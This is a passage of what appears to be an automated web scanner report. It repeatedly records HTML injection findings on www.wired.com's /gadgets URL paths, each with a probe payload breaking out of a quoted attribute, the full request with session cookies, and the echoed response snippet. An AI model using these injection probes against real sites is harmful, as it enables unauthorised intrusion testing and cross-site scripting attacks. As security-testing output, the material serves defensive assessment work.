User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29332
Vary: Accept-Encoding
Cache-Control: max-age=224
Expires: Sun, 21 Nov 2010 20:17:08 GMT
Date: Sun, 21 Nov 2010 20:13:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets5d3c4"><a>44e9ad792ff">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f24"><a>01629cf0b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets20f24"><a>01629cf0b9a/digitalcameras HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:11:26 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets20f24"><a>01629cf0b9a ss_digitalcameras">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0fc"><a>827ec64b19b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/digitalcamerascb0fc"><a>827ec64b19b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_digitalcamerascb0fc"><a>827ec64b19b">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfac"><a>5cabf0c5d32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets4bfac"><a>5cabf0c5d32/displays HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:43 GMT
Date: Sun, 21 Nov 2010 23:07:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets4bfac"><a>5cabf0c5d32 ss_displays">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db025"><a>555d174deea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/displaysdb025"><a>555d174deea HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:07 GMT
Date: Sun, 21 Nov 2010 23:08:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_displaysdb025"><a>555d174deea">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba86"><a>e8f52bb4221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgetsdba86"><a>e8f52bb4221/gadgetreviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsdba86"><a>e8f52bb4221 ss_gadgetreviews">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e399"><a>cebb494f95a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/gadgetreviews1e399"><a>cebb494f95a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:32 GMT
Date: Sun, 21 Nov 2010 23:08:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_gadgetreviews1e399"><a>cebb494f95a">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d93"><a>5fa7d6b4d51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgetsa8d93"><a>5fa7d6b4d51/mac HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:41 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsa8d93"><a>5fa7d6b4d51 ss_mac">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821e8"><a>04b40dd3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/mac821e8"><a>04b40dd3412 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=551 Expires: Sun, 21 Nov 2010 23:17:48 GMT Date: Sun, 21 Nov 2010 23:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_mac821e8"><a>04b40dd3412"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90641"><a>ba5864f027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets90641"><a>ba5864f027/miscellaneous HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29360 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:03 GMT Date: Sun, 21 Nov 2010 23:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets90641"><a>ba5864f027 ss_miscellaneous"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae2a5"><a>4df9c3f8bcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/miscellaneousae2a5"><a>4df9c3f8bcc HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:38 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_miscellaneousae2a5"><a>4df9c3f8bcc"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6cc"><a>2ec7c30f53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets5c6cc"><a>2ec7c30f53a/mods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Sun, 21 Nov 2010 23:12:08 GMT Date: Sun, 21 Nov 2010 23:08:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets5c6cc"><a>2ec7c30f53a ss_mods"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc27"><a>e4a182d7a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/modsedc27"><a>e4a182d7a54 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=595 Expires: Sun, 21 Nov 2010 23:18:45 GMT Date: Sun, 21 Nov 2010 23:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_modsedc27"><a>e4a182d7a54"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29290"><a>3e97c83f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets29290"><a>3e97c83f0a7/pcs HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:18 GMT Date: Sun, 21 Nov 2010 23:08:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets29290"><a>3e97c83f0a7 ss_pcs"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea349"><a>abc8fc5b833 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/pcsea349"><a>abc8fc5b833 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:47 GMT Date: Sun, 21 Nov 2010 23:08:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_pcsea349"><a>abc8fc5b833"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139b1"><a>6824c99afe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets139b1"><a>6824c99afe8/portablemusic HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 23:12:16 GMT Date: Sun, 21 Nov 2010 23:08:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets139b1"><a>6824c99afe8 ss_portablemusic"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9890b"><a>1a2bf9e403d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/portablemusic9890b"><a>1a2bf9e403d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:08:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_portablemusic9890b"><a>1a2bf9e403d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45461"><a>16a5e5e1666 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets45461"><a>16a5e5e1666/wireless HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:23 GMT Date: Sun, 21 Nov 2010 23:08:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets45461"><a>16a5e5e1666 ss_wireless"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd750"><a>8d8676eb6a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
